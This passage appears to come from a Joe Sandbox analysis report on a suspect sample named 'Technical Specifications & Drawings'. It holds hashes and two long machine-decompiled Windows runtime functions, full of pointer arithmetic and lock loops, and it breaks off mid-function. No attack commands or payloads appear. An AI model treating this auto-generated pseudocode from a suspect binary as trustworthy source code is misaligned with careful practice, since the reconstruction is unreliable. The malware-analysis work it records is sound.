                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                  • Instruction ID: c8208ef1cea5cc6043c73c7c3cfa9802f23942f9c5bbbab25d57425407953e47
                                                  • Opcode Fuzzy Hash: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                  • Instruction Fuzzy Hash: 42F17D706082118FD725CF18C8A4A7AFBE1FF98B14F14496EF986CB290E734D981CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E017D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed char _v24;
                                                  				intOrPtr _v28;
                                                  				signed int _v32;
                                                  				void* _v36;
                                                  				char _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				unsigned int _v60;
                                                  				char _v64;
                                                  				unsigned int _v68;
                                                  				signed int _v72;
                                                  				char _v73;
                                                  				signed int _v74;
                                                  				char _v75;
                                                  				signed int _v76;
                                                  				void* _v81;
                                                  				void* _v82;
                                                  				void* _v89;
                                                  				void* _v92;
                                                  				void* _v97;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed char _t128;
                                                  				void* _t129;
                                                  				signed int _t130;
                                                  				void* _t132;
                                                  				signed char _t133;
                                                  				intOrPtr _t135;
                                                  				signed int _t137;
                                                  				signed int _t140;
                                                  				signed int* _t144;
                                                  				signed int* _t145;
                                                  				intOrPtr _t146;
                                                  				signed int _t147;
                                                  				signed char* _t148;
                                                  				signed int _t149;
                                                  				signed int _t153;
                                                  				signed int _t169;
                                                  				signed int _t174;
                                                  				signed int _t180;
                                                  				void* _t197;
                                                  				void* _t198;
                                                  				signed int _t201;
                                                  				intOrPtr* _t202;
                                                  				intOrPtr* _t205;
                                                  				signed int _t210;
                                                  				signed int _t215;
                                                  				signed int _t218;
                                                  				signed char _t221;
                                                  				signed int _t226;
                                                  				char _t227;
                                                  				signed int _t228;
                                                  				void* _t229;
                                                  				unsigned int _t231;
                                                  				void* _t235;
                                                  				signed int _t240;
                                                  				signed int _t241;
                                                  				void* _t242;
                                                  				signed int _t246;
                                                  				signed int _t248;
                                                  				signed int _t252;
                                                  				signed int _t253;
                                                  				void* _t254;
                                                  				intOrPtr* _t256;
                                                  				intOrPtr _t257;
                                                  				unsigned int _t262;
                                                  				signed int _t265;
                                                  				void* _t267;
                                                  				signed int _t275;
                                                  
                                                  				_t198 = __ebx;
                                                  				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                  				_v68 = __ecx;
                                                  				_v73 = 0;
                                                  				_t201 = __edx & 0x00002000;
                                                  				_t128 = __edx & 0xffffdfff;
                                                  				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                  				_v72 = _t128;
                                                  				if((_t128 & 0x00000008) != 0) {
                                                  					__eflags = _t128 - 8;
                                                  					if(_t128 != 8) {
                                                  						L69:
                                                  						_t129 = 0xc000000d;
                                                  						goto L23;
                                                  					} else {
                                                  						_t130 = 0;
                                                  						_v72 = 0;
                                                  						_v75 = 1;
                                                  						L2:
                                                  						_v74 = 1;
                                                  						_t226 =  *0x1898714; // 0x0
                                                  						if(_t226 != 0) {
                                                  							__eflags = _t201;
                                                  							if(_t201 != 0) {
                                                  								L62:
                                                  								_v74 = 1;
                                                  								L63:
                                                  								_t130 = _t226 & 0xffffdfff;
                                                  								_v72 = _t130;
                                                  								goto L3;
                                                  							}
                                                  							_v74 = _t201;
                                                  							__eflags = _t226 & 0x00002000;
                                                  							if((_t226 & 0x00002000) == 0) {
                                                  								goto L63;
                                                  							}
                                                  							goto L62;
                                                  						}
                                                  						L3:
                                                  						_t227 = _v75;
                                                  						L4:
                                                  						_t240 = 0;
                                                  						_v56 = 0;
                                                  						_t252 = _t130 & 0x00000100;
                                                  						if(_t252 != 0 || _t227 != 0) {
                                                  							_t240 = _v68;
                                                  							_t132 = E017D2EB0(_t240);
                                                  							__eflags = _t132 - 2;
                                                  							if(_t132 != 2) {
                                                  								__eflags = _t132 - 1;
                                                  								if(_t132 == 1) {
                                                  									goto L25;
                                                  								}
                                                  								__eflags = _t132 - 6;
                                                  								if(_t132 == 6) {
                                                  									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                  									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                  										goto L40;
                                                  									}
                                                  									_t197 = E017D2EB0(_t240 + 8);
                                                  									__eflags = _t197 - 2;
                                                  									if(_t197 == 2) {
                                                  										goto L25;
                                                  									}
                                                  								}
                                                  								L40:
                                                  								_t133 = 1;
                                                  								L26:
                                                  								_t228 = _v75;
                                                  								_v56 = _t240;
                                                  								__eflags = _t133;
                                                  								if(_t133 != 0) {
                                                  									__eflags = _t228;
                                                  									if(_t228 == 0) {
                                                  										L43:
                                                  										__eflags = _v72;
                                                  										if(_v72 == 0) {
                                                  											goto L8;
                                                  										}
                                                  										goto L69;
                                                  									}
                                                  									_t133 = E017A58EC(_t240);
                                                  									_t221 =  *0x1895cac; // 0x16
                                                  									__eflags = _t221 & 0x00000040;
                                                  									if((_t221 & 0x00000040) != 0) {
                                                  										_t228 = 0;
                                                  										__eflags = _t252;
                                                  										if(_t252 != 0) {
                                                  											goto L43;
                                                  										}
                                                  										_t133 = _v72;
                                                  										goto L7;
                                                  									}
                                                  									goto L43;
                                                  								} else {
                                                  									_t133 = _v72;
                                                  									goto L6;
                                                  								}
                                                  							}
                                                  							L25:
                                                  							_t133 = _v73;
                                                  							goto L26;
                                                  						} else {
                                                  							L6:
                                                  							_t221 =  *0x1895cac; // 0x16
                                                  							L7:
                                                  							if(_t133 != 0) {
                                                  								__eflags = _t133 & 0x00001000;
                                                  								if((_t133 & 0x00001000) != 0) {
                                                  									_t133 = _t133 | 0x00000a00;
                                                  									__eflags = _t221 & 0x00000004;
                                                  									if((_t221 & 0x00000004) != 0) {
                                                  										_t133 = _t133 | 0x00000400;
                                                  									}
                                                  								}
                                                  								__eflags = _t228;
                                                  								if(_t228 != 0) {
                                                  									_t133 = _t133 | 0x00000100;
                                                  								}
                                                  								_t229 = E017E4A2C(0x1896e40, 0x17e4b30, _t133, _t240);
                                                  								__eflags = _t229;
                                                  								if(_t229 == 0) {
                                                  									_t202 = _a20;
                                                  									goto L100;
                                                  								} else {
                                                  									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                  									L15:
                                                  									_t202 = _a20;
                                                  									 *_t202 = _t135;
                                                  									if(_t229 == 0) {
                                                  										L100:
                                                  										 *_a4 = 0;
                                                  										_t137 = _a8;
                                                  										__eflags = _t137;
                                                  										if(_t137 != 0) {
                                                  											 *_t137 = 0;
                                                  										}
                                                  										 *_t202 = 0;
                                                  										_t129 = 0xc0000017;
                                                  										goto L23;
                                                  									} else {
                                                  										_t242 = _a16;
                                                  										if(_t242 != 0) {
                                                  											_t254 = _t229;
                                                  											memcpy(_t242, _t254, 0xd << 2);
                                                  											_t267 = _t267 + 0xc;
                                                  											_t242 = _t254 + 0x1a;
                                                  										}
                                                  										_t205 = _a4;
                                                  										_t25 = _t229 + 0x48; // 0x48
                                                  										 *_t205 = _t25;
                                                  										_t140 = _a8;
                                                  										if(_t140 != 0) {
                                                  											__eflags =  *((char*)(_t267 + 0xa));
                                                  											if( *((char*)(_t267 + 0xa)) != 0) {
                                                  												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                  											} else {
                                                  												 *_t140 = 0;
                                                  											}
                                                  										}
                                                  										_t256 = _a12;
                                                  										if(_t256 != 0) {
                                                  											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                  										}
                                                  										_t257 =  *_t205;
                                                  										_v48 = 0;
                                                  										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                  										_v56 = 0;
                                                  										_v52 = 0;
                                                  										_t144 =  *( *[fs:0x30] + 0x50);
                                                  										if(_t144 != 0) {
                                                  											__eflags =  *_t144;
                                                  											if( *_t144 == 0) {
                                                  												goto L20;
                                                  											}
                                                  											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                  											goto L21;
                                                  										} else {
                                                  											L20:
                                                  											_t145 = 0x7ffe0384;
                                                  											L21:
                                                  											if( *_t145 != 0) {
                                                  												_t146 =  *[fs:0x30];
                                                  												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                  												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                  													_t147 = E017C7D50();
                                                  													__eflags = _t147;
                                                  													if(_t147 == 0) {
                                                  														_t148 = 0x7ffe0385;
                                                  													} else {
                                                  														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                  													}
                                                  													__eflags =  *_t148 & 0x00000020;
                                                  													if(( *_t148 & 0x00000020) != 0) {
                                                  														_t149 = _v72;
                                                  														__eflags = _t149;
                                                  														if(__eflags == 0) {
                                                  															_t149 = 0x1785c80;
                                                  														}
                                                  														_push(_t149);
                                                  														_push( &_v48);
                                                  														 *((char*)(_t267 + 0xb)) = E017DF6E0(_t198, _t242, _t257, __eflags);
                                                  														_push(_t257);
                                                  														_push( &_v64);
                                                  														_t153 = E017DF6E0(_t198, _t242, _t257, __eflags);
                                                  														__eflags =  *((char*)(_t267 + 0xb));
                                                  														if( *((char*)(_t267 + 0xb)) != 0) {
                                                  															__eflags = _t153;
                                                  															if(_t153 != 0) {
                                                  																__eflags = 0;
                                                  																E01827016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                  																L017C2400(_t267 + 0x20);
                                                  															}
                                                  															L017C2400( &_v64);
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											_t129 = 0;
                                                  											L23:
                                                  											return _t129;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  							L8:
                                                  							_t275 = _t240;
                                                  							if(_t275 != 0) {
                                                  								_v73 = 0;
                                                  								_t253 = 0;
                                                  								__eflags = 0;
                                                  								L29:
                                                  								_push(0);
                                                  								_t241 = E017D2397(_t240);
                                                  								__eflags = _t241;
                                                  								if(_t241 == 0) {
                                                  									_t229 = 0;
                                                  									L14:
                                                  									_t135 = 0;
                                                  									goto L15;
                                                  								}
                                                  								__eflags =  *((char*)(_t267 + 0xb));
                                                  								 *(_t241 + 0x34) = 1;
                                                  								if( *((char*)(_t267 + 0xb)) != 0) {
                                                  									E017C2280(_t134, 0x1898608);
                                                  									__eflags =  *0x1896e48 - _t253; // 0x0
                                                  									if(__eflags != 0) {
                                                  										L48:
                                                  										_t253 = 0;
                                                  										__eflags = 0;
                                                  										L49:
                                                  										E017BFFB0(_t198, _t241, 0x1898608);
                                                  										__eflags = _t253;
                                                  										if(_t253 != 0) {
                                                  											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                  										}
                                                  										goto L31;
                                                  									}
                                                  									 *0x1896e48 = _t241;
                                                  									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                  									__eflags = _t253;
                                                  									if(_t253 != 0) {
                                                  										_t57 = _t253 + 0x34;
                                                  										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                  										__eflags =  *_t57;
                                                  										if( *_t57 == 0) {
                                                  											goto L49;
                                                  										}
                                                  									}
                                                  									goto L48;
                                                  								}
                                                  								L31:
                                                  								_t229 = _t241;
                                                  								goto L14;
                                                  							}
                                                  							_v73 = 1;
                                                  							_v64 = _t240;
                                                  							asm("lock bts dword [esi], 0x0");
                                                  							if(_t275 < 0) {
                                                  								_t231 =  *0x1898608; // 0x0
                                                  								while(1) {
                                                  									_v60 = _t231;
                                                  									__eflags = _t231 & 0x00000001;
                                                  									if((_t231 & 0x00000001) != 0) {
                                                  										goto L76;
                                                  									}
                                                  									_t73 = _t231 + 1; // 0x1
                                                  									_t210 = _t73;
                                                  									asm("lock cmpxchg [edi], ecx");
                                                  									__eflags = _t231 - _t231;
                                                  									if(_t231 != _t231) {
                                                  										L92:
                                                  										_t133 = E017D6B90(_t210,  &_v64);
                                                  										_t262 =  *0x1898608; // 0x0
                                                  										L93:
                                                  										_t231 = _t262;
                                                  										continue;
                                                  									}
                                                  									_t240 = _v56;
                                                  									goto L10;
                                                  									L76:
                                                  									_t169 = E017DE180(_t133);
                                                  									__eflags = _t169;
                                                  									if(_t169 != 0) {
                                                  										_push(0xc000004b);
                                                  										_push(0xffffffff);
                                                  										E017E97C0();
                                                  										_t231 = _v68;
                                                  									}
                                                  									_v72 = 0;
                                                  									_v24 =  *( *[fs:0x18] + 0x24);
                                                  									_v16 = 3;
                                                  									_v28 = 0;
                                                  									__eflags = _t231 & 0x00000002;
                                                  									if((_t231 & 0x00000002) == 0) {
                                                  										_v32 =  &_v36;
                                                  										_t174 = _t231 >> 4;
                                                  										__eflags = 1 - _t174;
                                                  										_v20 = _t174;
                                                  										asm("sbb ecx, ecx");
                                                  										_t210 = 3 |  &_v36;
                                                  										__eflags = _t174;
                                                  										if(_t174 == 0) {
                                                  											_v20 = 0xfffffffe;
                                                  										}
                                                  									} else {
                                                  										_v32 = 0;
                                                  										_v20 = 0xffffffff;
                                                  										_v36 = _t231 & 0xfffffff0;
                                                  										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                  										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                  									}
                                                  									asm("lock cmpxchg [edi], esi");
                                                  									_t262 = _t231;
                                                  									__eflags = _t262 - _t231;
                                                  									if(_t262 != _t231) {
                                                  										goto L92;
                                                  									} else {
                                                  										__eflags = _v72;
                                                  										if(_v72 != 0) {
                                                  											E017E006A(0x1898608, _t210);
                                                  										}
                                                  										__eflags =  *0x7ffe036a - 1;
                                                  										if(__eflags <= 0) {
                                                  											L89:
                                                  											_t133 =  &_v16;
                                                  											asm("lock btr dword [eax], 0x1");
                                                  											if(__eflags >= 0) {
                                                  												goto L93;
                                                  											} else {
                                                  												goto L90;
                                                  											}
                                                  											do {
                                                  												L90:
                                                  												_push(0);
                                                  												_push(0x1898608);
                                                  												E017EB180();
                                                  												_t133 = _v24;
                                                  												__eflags = _t133 & 0x00000004;
                                                  											} while ((_t133 & 0x00000004) == 0);
                                                  											goto L93;
                                                  										} else {
                                                  											_t218 =  *0x1896904; // 0x400
                                                  											__eflags = _t218;
                                                  											if(__eflags == 0) {
                                                  												goto L89;
                                                  											} else {
                                                  												goto L87;
                                                  											}
                                                  											while(1) {
                                                  												L87:
                                                  												__eflags = _v16 & 0x00000002;
                                                  												if(__eflags == 0) {
                                                  													goto L89;
                                                  												}
                                                  												asm("pause");
                                                  												_t218 = _t218 - 1;
                                                  												__eflags = _t218;
                                                  												if(__eflags != 0) {
                                                  													continue;
                                                  												}
                                                  												goto L89;
                                                  											}
                                                  											goto L89;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  							L10:
                                                  							_t229 =  *0x1896e48; // 0x0
                                                  							_v72 = _t229;
                                                  							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                  								E017BFFB0(_t198, _t240, 0x1898608);
                                                  								_t253 = _v76;
                                                  								goto L29;
                                                  							} else {
                                                  								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                  								asm("lock cmpxchg [esi], ecx");
                                                  								_t215 = 1;
                                                  								if(1 != 1) {
                                                  									while(1) {
                                                  										_t246 = _t215 & 0x00000006;
                                                  										_t180 = _t215;
                                                  										__eflags = _t246 - 2;
                                                  										_v56 = _t246;
                                                  										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                  										asm("lock cmpxchg [edi], esi");
                                                  										_t248 = _v56;
                                                  										__eflags = _t180 - _t215;
                                                  										if(_t180 == _t215) {
                                                  											break;
                                                  										}
                                                  										_t215 = _t180;
                                                  									}
                                                  									__eflags = _t248 - 2;
                                                  									if(_t248 == 2) {
                                                  										__eflags = 0;
                                                  										E017E00C2(0x1898608, 0, _t235);
                                                  									}
                                                  									_t229 = _v72;
                                                  								}
                                                  								goto L14;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				_t227 = 0;
                                                  				_v75 = 0;
                                                  				if(_t128 != 0) {
                                                  					goto L4;
                                                  				}
                                                  				goto L2;
                                                  			}

                                                  0x01815a58
                                                  0x01815a5d
                                                  0x01815a5f
                                                  0x01815a71
                                                  0x01815a61
                                                  0x01815a6a
                                                  0x01815a6a
                                                  0x01815a76
                                                  0x01815a79
                                                  0x01815a7f
                                                  0x01815a83
                                                  0x01815a85
                                                  0x01815a87
                                                  0x01815a87
                                                  0x01815a8c
                                                  0x01815a91
                                                  0x01815a97
                                                  0x01815a9f
                                                  0x01815aa0
                                                  0x01815aa1
                                                  0x01815aa6
                                                  0x01815aab
                                                  0x01815ab1
                                                  0x01815ab3
                                                  0x01815ab9
                                                  0x01815aca
                                                  0x01815ad4
                                                  0x01815ad4
                                                  0x01815ade
                                                  0x01815ade
                                                  0x01815aab
                                                  0x01815a79
                                                  0x01815a52
                                                  0x017d21f7
                                                  0x017d21f9
                                                  0x017d21fe
                                                  0x017d21fe
                                                  0x017d21e3
                                                  0x017d2195
                                                  0x017d236c
                                                  0x017d2122
                                                  0x017d2122
                                                  0x017d2124
                                                  0x017d2231
                                                  0x017d2236
                                                  0x017d2236
                                                  0x017d2238
                                                  0x017d2238
                                                  0x017d2240
                                                  0x017d2242
                                                  0x017d2244
                                                  0x018159fc
                                                  0x017d218c
                                                  0x017d218c
                                                  0x00000000
                                                  0x017d218c
                                                  0x017d224a
                                                  0x017d224f
                                                  0x017d2256
                                                  0x017d2304
                                                  0x017d2309
                                                  0x017d230f
                                                  0x017d231e
                                                  0x017d231e
                                                  0x017d231e
                                                  0x017d2320
                                                  0x017d2325
                                                  0x017d232a
                                                  0x017d232c
                                                  0x017d233e
                                                  0x017d233e
                                                  0x00000000
                                                  0x017d232c
                                                  0x017d2311
                                                  0x017d2317
                                                  0x017d231a
                                                  0x017d231c
                                                  0x017d2380
                                                  0x017d2380
                                                  0x017d2380
                                                  0x017d2384
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2386
                                                  0x00000000
                                                  0x017d231c
                                                  0x017d225c
                                                  0x017d225c
                                                  0x00000000
                                                  0x017d225c
                                                  0x017d212a
                                                  0x017d2134
                                                  0x017d2138
                                                  0x017d213d
                                                  0x01815858
                                                  0x01815863
                                                  0x01815863
                                                  0x01815867
                                                  0x0181586a
                                                  0x00000000
                                                  0x00000000
                                                  0x0181586c
                                                  0x0181586c
                                                  0x01815871
                                                  0x01815875
                                                  0x01815877
                                                  0x01815997
                                                  0x0181599c
                                                  0x018159a1
                                                  0x018159a7
                                                  0x018159a7
                                                  0x00000000
                                                  0x018159a7
                                                  0x0181587d
                                                  0x00000000
                                                  0x0181588b
                                                  0x0181588b
                                                  0x01815890
                                                  0x01815892
                                                  0x01815894
                                                  0x01815899
                                                  0x0181589b
                                                  0x018158a0
                                                  0x018158a0
                                                  0x018158aa
                                                  0x018158b2
                                                  0x018158b6
                                                  0x018158be
                                                  0x018158c6
                                                  0x018158c9
                                                  0x0181590d
                                                  0x01815917
                                                  0x0181591a
                                                  0x0181591c
                                                  0x01815920
                                                  0x01815928
                                                  0x0181592a
                                                  0x0181592c
                                                  0x0181592e
                                                  0x0181592e
                                                  0x018158cb
                                                  0x018158cd
                                                  0x018158d8
                                                  0x018158e0
                                                  0x018158f4
                                                  0x018158fe
                                                  0x018158fe
                                                  0x0181593a
                                                  0x0181593e
                                                  0x01815940
                                                  0x01815942
                                                  0x00000000
                                                  0x01815944
                                                  0x01815944
                                                  0x01815949
                                                  0x0181594e
                                                  0x0181594e
                                                  0x01815953
                                                  0x0181595b
                                                  0x01815976
                                                  0x01815976
                                                  0x0181597a
                                                  0x0181597f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815981
                                                  0x01815981
                                                  0x01815981
                                                  0x01815983
                                                  0x01815988
                                                  0x0181598d
                                                  0x01815991
                                                  0x01815991
                                                  0x00000000
                                                  0x0181595d
                                                  0x0181595d
                                                  0x01815963
                                                  0x01815965
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815967
                                                  0x01815967
                                                  0x0181596b
                                                  0x0181596d
                                                  0x00000000
                                                  0x00000000
                                                  0x0181596f
                                                  0x01815971
                                                  0x01815971
                                                  0x01815974
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01815974
                                                  0x00000000
                                                  0x01815967
                                                  0x0181595b
                                                  0x01815942
                                                  0x01815863
                                                  0x017d2143
                                                  0x017d2143
                                                  0x017d2149
                                                  0x017d214f
                                                  0x017d22f1
                                                  0x017d22f6
                                                  0x00000000
                                                  0x017d2173
                                                  0x017d2173
                                                  0x017d217d
                                                  0x017d2181
                                                  0x017d2186
                                                  0x018159ae
                                                  0x018159b2
                                                  0x018159b5
                                                  0x018159b7
                                                  0x018159ba
                                                  0x018159cd
                                                  0x018159d1
                                                  0x018159d5
                                                  0x018159d9
                                                  0x018159db
                                                  0x00000000
                                                  0x00000000
                                                  0x018159dd
                                                  0x018159dd
                                                  0x018159e1
                                                  0x018159e4
                                                  0x018159e7
                                                  0x018159ee
                                                  0x018159ee
                                                  0x018159f3
                                                  0x018159f3
                                                  0x00000000
                                                  0x017d2186
                                                  0x017d214f
                                                  0x017d2106
                                                  0x017d2266
                                                  0x017d20d8
                                                  0x017d20da
                                                  0x017d20e0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                  • Instruction ID: 305f2e8f2e04a554a39e42476f40381753d48e38528f32b2a3c36b49d5316ed2
                                                  • Opcode Fuzzy Hash: 6faf9740fcf6a1f2192b7fed782091d297f3222084bd252cb09e7217ab14a39a
                                                  • Instruction Fuzzy Hash: FFF1F2326083499FD726CF2CC84472ABBF6AFC6314F08855DE995CB246D735D942CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E017B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                  				void* _t136;
                                                  				signed int _t139;
                                                  				signed int _t141;
                                                  				signed int _t145;
                                                  				intOrPtr _t146;
                                                  				signed int _t149;
                                                  				signed int _t150;
                                                  				signed int _t161;
                                                  				signed int _t163;
                                                  				signed int _t165;
                                                  				signed int _t169;
                                                  				signed int _t171;
                                                  				signed int _t194;
                                                  				signed int _t200;
                                                  				void* _t201;
                                                  				signed int _t204;
                                                  				signed int _t206;
                                                  				signed int _t210;
                                                  				signed int _t214;
                                                  				signed int _t215;
                                                  				signed int _t218;
                                                  				void* _t221;
                                                  				signed int _t224;
                                                  				signed int _t226;
                                                  				intOrPtr _t228;
                                                  				signed int _t232;
                                                  				signed int _t233;
                                                  				signed int _t234;
                                                  				void* _t237;
                                                  				void* _t238;
                                                  
                                                  				_t236 = __esi;
                                                  				_t235 = __edi;
                                                  				_t193 = __ebx;
                                                  				_push(0x70);
                                                  				_push(0x187f9c0);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                  				if( *0x1897b04 == 0) {
                                                  					L4:
                                                  					goto L5;
                                                  				} else {
                                                  					_t136 = E017BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                  					_t236 = 0;
                                                  					if(_t136 < 0) {
                                                  						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                  					}
                                                  					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                  						_t193 =  *( *[fs:0x30] + 0x18);
                                                  						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                  						 *(_t237 - 0x68) = _t236;
                                                  						 *(_t237 - 0x6c) = _t236;
                                                  						_t235 = _t236;
                                                  						 *(_t237 - 0x60) = _t236;
                                                  						E017C2280( *[fs:0x30], 0x1898550);
                                                  						_t139 =  *0x1897b04; // 0x1
                                                  						__eflags = _t139 - 1;
                                                  						if(__eflags != 0) {
                                                  							_t200 = 0xc;
                                                  							_t201 = _t237 - 0x40;
                                                  							_t141 = E017DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                  							 *(_t237 - 0x44) = _t141;
                                                  							__eflags = _t141;
                                                  							if(_t141 < 0) {
                                                  								L50:
                                                  								E017BFFB0(_t193, _t235, 0x1898550);
                                                  								L5:
                                                  								return E017FD130(_t193, _t235, _t236);
                                                  							}
                                                  							_push(_t201);
                                                  							_t221 = 0x10;
                                                  							_t202 =  *(_t237 - 0x40);
                                                  							_t145 = E017A1C45( *(_t237 - 0x40), _t221);
                                                  							 *(_t237 - 0x44) = _t145;
                                                  							__eflags = _t145;
                                                  							if(_t145 < 0) {
                                                  								goto L50;
                                                  							}
                                                  							_t146 =  *0x1897b9c; // 0x0
                                                  							_t235 = L017C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                  							 *(_t237 - 0x60) = _t235;
                                                  							__eflags = _t235;
                                                  							if(_t235 == 0) {
                                                  								_t149 = 0xc0000017;
                                                  								 *(_t237 - 0x44) = 0xc0000017;
                                                  							} else {
                                                  								_t149 =  *(_t237 - 0x44);
                                                  							}
                                                  							__eflags = _t149;
                                                  							if(__eflags >= 0) {
                                                  								L8:
                                                  								 *(_t237 - 0x64) = _t235;
                                                  								_t150 =  *0x1897b10; // 0x0
                                                  								 *(_t237 - 0x4c) = _t150;
                                                  								_push(_t237 - 0x74);
                                                  								_push(_t237 - 0x39);
                                                  								_push(_t237 - 0x58);
                                                  								_t193 = E017DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                  								 *(_t237 - 0x44) = _t193;
                                                  								__eflags = _t193;
                                                  								if(_t193 < 0) {
                                                  									L30:
                                                  									E017BFFB0(_t193, _t235, 0x1898550);
                                                  									__eflags = _t235 - _t237 - 0x38;
                                                  									if(_t235 != _t237 - 0x38) {
                                                  										_t235 =  *(_t237 - 0x48);
                                                  										L017C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                  									} else {
                                                  										_t235 =  *(_t237 - 0x48);
                                                  									}
                                                  									__eflags =  *(_t237 - 0x6c);
                                                  									if( *(_t237 - 0x6c) != 0) {
                                                  										L017C77F0(_t235, _t236,  *(_t237 - 0x6c));
                                                  									}
                                                  									__eflags = _t193;
                                                  									if(_t193 >= 0) {
                                                  										goto L4;
                                                  									} else {
                                                  										goto L5;
                                                  									}
                                                  								}
                                                  								_t204 =  *0x1897b04; // 0x1
                                                  								 *(_t235 + 8) = _t204;
                                                  								__eflags =  *((char*)(_t237 - 0x39));
                                                  								if( *((char*)(_t237 - 0x39)) != 0) {
                                                  									 *(_t235 + 4) = 1;
                                                  									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                  									_t161 =  *0x1897b10; // 0x0
                                                  									 *(_t237 - 0x4c) = _t161;
                                                  								} else {
                                                  									 *(_t235 + 4) = _t236;
                                                  									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                  								}
                                                  								 *((intOrPtr*)(_t237 - 0x54)) = E017E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                  								_t224 = _t236;
                                                  								 *(_t237 - 0x40) = _t236;
                                                  								 *(_t237 - 0x50) = _t236;
                                                  								while(1) {
                                                  									_t163 =  *(_t235 + 8);
                                                  									__eflags = _t224 - _t163;
                                                  									if(_t224 >= _t163) {
                                                  										break;
                                                  									}
                                                  									_t228 =  *0x1897b9c; // 0x0
                                                  									_t214 = L017C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                  									 *(_t237 - 0x78) = _t214;
                                                  									__eflags = _t214;
                                                  									if(_t214 == 0) {
                                                  										L52:
                                                  										_t193 = 0xc0000017;
                                                  										L19:
                                                  										 *(_t237 - 0x44) = _t193;
                                                  										L20:
                                                  										_t206 =  *(_t237 - 0x40);
                                                  										__eflags = _t206;
                                                  										if(_t206 == 0) {
                                                  											L26:
